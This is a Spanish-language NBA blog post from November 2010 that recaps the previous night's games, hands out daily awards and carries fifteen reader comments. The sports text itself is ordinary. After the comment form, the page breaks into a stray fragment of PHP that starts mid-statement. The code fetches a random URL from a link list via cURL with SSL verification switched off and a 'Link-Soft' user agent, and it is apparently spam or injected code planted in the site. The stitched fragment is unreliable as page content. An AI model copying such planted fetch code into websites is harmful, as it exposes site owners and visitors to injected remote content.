La Crónica (22/11/2010)

23 de November de 2010 por TheDeerHunter

Jornada intensa con algunos resultados sorprendentes y otros muy interesantes.

Aunque pueda parecer lo contrario, la mayor sorpresa de la noche no fue el revolcón que se llevaron los Heat en casa contra los Pacers (93-77). Si ponen un circo les crecen los enanos y ahora se les ha lesionado Udonis Haslem de gravedad. Si la lesión de Miller fue dura, ésta podría apartarles de cualquier objetivo serio. La segunda unidad es un solar y por si fuera poco Wade cuajó el peor partido de su vida (¿no os suena que lo dijimos hace poco?). Lo tienen todo muy cogido por hilos y ante cualquier incidencia el modelo se tambalea.

Como decíamos, realmente la mayor sorpresa de la noche fue el tropiezo de los Hornets en casa de los colistas (95-99). Habíamos notado ciertas mejoras de la mano de los rookies pero no tantas como para pensar que iban a colarles más de un 50% a los, hasta anoche, líderes. Por la parte de los “avispones” debutó Jarrett Jack y lo hizo bien, pero si vas a permitir que los Clippers te claven 100 puntos sin meter tiros libres hace falta que Okafor, Ariza y algún otro, anote con cierta soltura. Si pretenden ser candidatos a algo deberán mejorar su ratio ofensivo.

En los duelos de “alto standing” los Spurs le privaron pronto del liderato del este a Orlando (97-106). Los Magic perdieron por culpa de las pérdidas y del bombardeo de tres a partir de Bonner. Es un arma que ya les ha aportado grandes réditos esta campaña al equipo de Popovic. Por contra, el estado de forma de Carter es más que preocupante. Los Celtics  se aprovecharon del tropiezo destrozando a los Hawks en Atlanta con Nate Robinson supliendo a Rajon Rondo (99-76). Ojo al boxscore de los halconcitos: Josh 2, Marvin 2, Al 6, Joe 6… es para estar preocupados.

En los duelos algo más desequilibrados los Thunder ganaron a los Wolves (107-117), los Jazz a los Kings (83-94) y Denver a los Warriors (106-89) con partidazo de Melo.

Para terminar Nash volvió, vio y venció en su regreso (123-116). Los Rockets jugaron mejor pero nada pudieron hacer para detener el vertiginoso ataque de los Suns.

PREMIOS

MVP: Reinado indiscutible el de hoy para Carmelo Anthony con su récord de la temporada en puntuación (39). Además aportó 9 rebotes, 5 asistencias y un par de robos en la paliza de los Nuggets frente los Warriors.

Rookie: Como tarde mucho en volver John Wall se va a encontrar con el ROY decidido. Con los 24 puntos, 4 asistencias y 13 rebotes de ayer, Blake Griffin sigue a velocidad de crucero. El partido de Al-Farouq Aminu tampoco tuvo desperdicio: 16 puntos y 4 rebotes. Buenas noticias para los Clippers.

Sorpresa: Si en el anterior partido CJ Miles anotó 7 triples de 10 intentos convirtiéndose en el máximo artífice de la remontada de su equipo, en este, aún estando más comedido, también ha sido un factor clave en la victoria de los Jazz sobre los Kings con 20 puntos, 4 rebotes y 4 asistencias.

Decepción: ¿Alguien vio salir a jugar a los Hawks anoche? Parece una falta de respeto no presentarse a un partido en su propia cancha. Fuera quien fuera los que salieron en su lugar, al final del primer cuarto ya perdían de 26 puntos de diferencia. También estamos intentando averiguar quién era el hombre que se disfrazó de Dwyane Wade y acabó el partido con 3 puntos y un 1 de 13.

Esfuerzo en vano: Capturar 17 rebotes o más no es sinónimo de victoria y si no que se lo pregunten a Dwight Howard (26-18) y Kevin Love (24-17). David West, capturando 10 rebotes pero anotando 30 puntos, también se queda con la miel en los labios.

Comenta

15 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Splitter 10 segunditos anoche. Los Spurs van bien (genial incluso), pero no entiendo su poca participación.

      Citar

  2. MagicJohnson32 dice:
    #2

    Viendo el Spurs-Magic… Qué cosa más rara hizo Pop… Sentó a Blair a los 51 segundos de partido, lo volvió a poner como 1:30 más tarde, lo mantuvo un buen rato en pista, y al final acabó jugando 9 minutos… Pensé que era un ajuste por los tiros lejanos de Rashard pero no lo estaba haciendo mal Blair.

    Bueno, lo de Haslem precipita la llegada de Dampier a los Heat. Van a echar de menos a Haslem, hacía un gran papel.

      Citar

  3. TheDeerHunter dice:
    #3

    Dampier no les va a dar lo de Haslem ni empapadísimo de crack. Tampoco veo muy claro si les va solucionar la papeleta de la 2ª unidad.
    Habrá que empezar a llamar a los “Beach boys” como los “plantación de algodón boys”… porque van a tener que jugar hasta los tiempo muertos para tener alguna opción.

    Tenían difícil alcanzar los objetivos si todo funcionaba bien… pero con tanta lesión clave creo que lo tienen imposible.

      Citar

  4. pcerezo dice:
    #4

    Mister “Cazo Mix” Dampier a seguir jugando…estoy con Deer, nada de nada, salvo que sufra una transformación que ni el Dr. Jekyll…
    Pregunta: se quieren cargar a Spo y que baje Mr. Gomina? Ahora mismo los veo a años luz de Celtics puede que de Bulls y ya no te digo de Lakers, Spurs, Jazz y Dallas???

      Citar

  5. Scriers dice:
    #5

    Dios mío, ni borracho imaginaba que les fuera tan mal a Miami como para perder con Indiana, si solo Lebron debería poder con ellos… En cualquier caso, esto demuestra que no se puede menospreciar a los que hacen un equipo, y los Cavs lo eran, quizás no el más equilibrado del mundo ni el de mayor calidad pero eran un equipo.
    Luego a Wade le estoy viendo jugar y siempre lo veo ansioso, siempre. No se si antes también lo estaba y yo no me daba cuenta o qué, pero siempre lo veo ansioso.
    Por lo demás, yo tampoco entiendo muy bien lo de Popovich, pero a estas alturas y con 11 victorias, ¿Quién le va a discutir? Yo creo que tanto Blair como Splitter podrían aportas algo más, pero si Duncan sigue resistiéndose al paso del tiempo y Bonner le da por meter triples, ya me dirás…
    Y así las cosas el Este es un solar. Solo los Celtics parecen mantener el nivel, pero Orlando o se arruga o no se aclara, Miami ya veis y Los Hawks se está demostrando lo que mucho vaticinaban, que no, que no hay para más y que ese nivel era más del que podían orfrecer.
    Se admiten alternativas entonces, ¿Bulls? ¿Bucks?

      Citar

  6. pcerezo dice:
    #6

    Estoy viendo las clasificaciones por conferencias y la del Este es una cosa terrible. Que Bucks con 5-8 estén en PO y Memphis con el mismo balance sean undécimos en el Oeste habla muy mal del Este.
    Cuándo se va a compensar esto?

      Citar

  7. TX dice:
    #7

    Lo de los Hornets me ha dado un “Zas, en toda la boca” xD

      Citar

  8. Txusma dice:
    #8

    Habéis votado ya para el AllStars? http://www.nba.com/allstar2011/asb/esp/daily.html

    La posición de pívot en el Oeste es un auténtico solar (muchos lesionados) y en cambio he de escoger entre Duncan, Nowitzki, Gasol, Love, Griffin, etc… como ala-pívots.
    Y curiosamente, este año Amare es ala-pívot en el Este cuando en el Oeste siempre era pívot, evitando pelearse con los arriba mencionados. Parece que les encanta que esté en el AllStars.

    De momento yo me he permitido dejar fuera a Kobe, decantándome por Chris Paul y Monta Ellis en el quinteto titular.

      Citar

  9. M dice:
    #9

    Nos reíamos, pero la maldición de Gilbert es poderosa… xD

      Citar

  10. GreenPride dice:
    #10

    De ayer vi los 2 teóricos mejores partidos Celtics-Hawks y Magic-Spurs.
    Del primero sólo se puede decir que fue un “no partido”. Los Celtics salieron muy mentalizados tras sus dos últimas extrañas derrotas y decididos a que esta vez todo fuese diferente. Eso unido a la absoluta desidia y falta de ganas de los Hawks dieron lugar a un partido que duró 5 o 6 minutos y en el que los Hawks nunca hicieron ni el intento por recuperar. Es el primer partido que veo a los Hawks que supongo que no siempre jugarán así si van en positivo pero vamos lo de ayer es para hacérselo mirar. En los Celtics bien Nate sustituyendo a Rondo en el 5 titular y partido super plácido para ellos en general.
    Mucho más interesante el Magic-Spurs. Los Magic castigaron a los Spurs por dentro como era de esperar pero aún así y a pesar de que Pop no jugó con Blair y Splitter los Spurs siguieron siempre en el partido. Después de un partido igualadísimo en los ultimos minutos un gran Manudonna y los triples de los Spurs decidieron. Los Magic juegan bien pero me da la impresión de que con Carter en ese estado de forma serán carne de cañón para los Celtics a la hora de los Playoffs.

      Citar

  11. Denise dice:
    #11

    Los Heat están teniendo problemas con las lesiones, además de que un proyecto tan ambicioso y con tantos cambios hay que darle su margen. Eso sí, al que le queda poco es a Spoelstra…apuesto a que no llega a 2011.
    me encanta Hibbert, ayer no hizo nada del otro mundo, pero me parece un pedazo jugador que dentro de algunos años llegará a ser All Star.
    Que nivelazo el de Utah, y pensar que no les metí en playoffs en la porra…

    Van Gundy Dimisión!!!

      Citar

  12. Rompe dice:
    #12

    Lo de Miami es hasta cierto punto comprensible. Han juntado 3 grandes jugadores, dos de ellos posiblemente entre los 5 mejores, y qué? Un equipo son mucho más que 3, y desde luego poco hay más aprovechable en ese equipo. El día que uno esté desafinado, o se lesiones alguno… pasa lo que pasa. Y la cosa es que Wade ya lleva unos cuantos así. Está jugando lesionado, le pueden las ganas?
    Por cierto, Lebron cuanto hace que no se marca un partido desastroso? Puede jugar mejor, peor… pero siempre bastante aceptable, hasta los partidazos que se marcaba en los Cavs. Pero no recuerdo un partido suyo para tirar a la basura directamente…
    Y a todos los grandes de vez en cuando les pasa…
    Increible el físico y la regularidad de este tío…

      Citar

  13. edgar dice:
    #13

    Blake Griffin no jugo unos partidos la temporada pasada? Entonces por que es rookie?

      Citar

  14. Vader dice:
    #14

    Blake Griffin no llego a debutar la temporada pasada.

    Saludos

      Citar

  15. scriers dice:
    #15

    ¿Qué opináis del traspaso de Jack por parte de Toronto? ¿No es un mal mensaje para el equipo? Para mi Jack tiene un mérito brutal, equipo al que va, equipo en el que se las apaña para ser importante. Y creo que estaba mejor que Calderón. Pero la pela es la pela… Y Toronto va a por el Draft…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>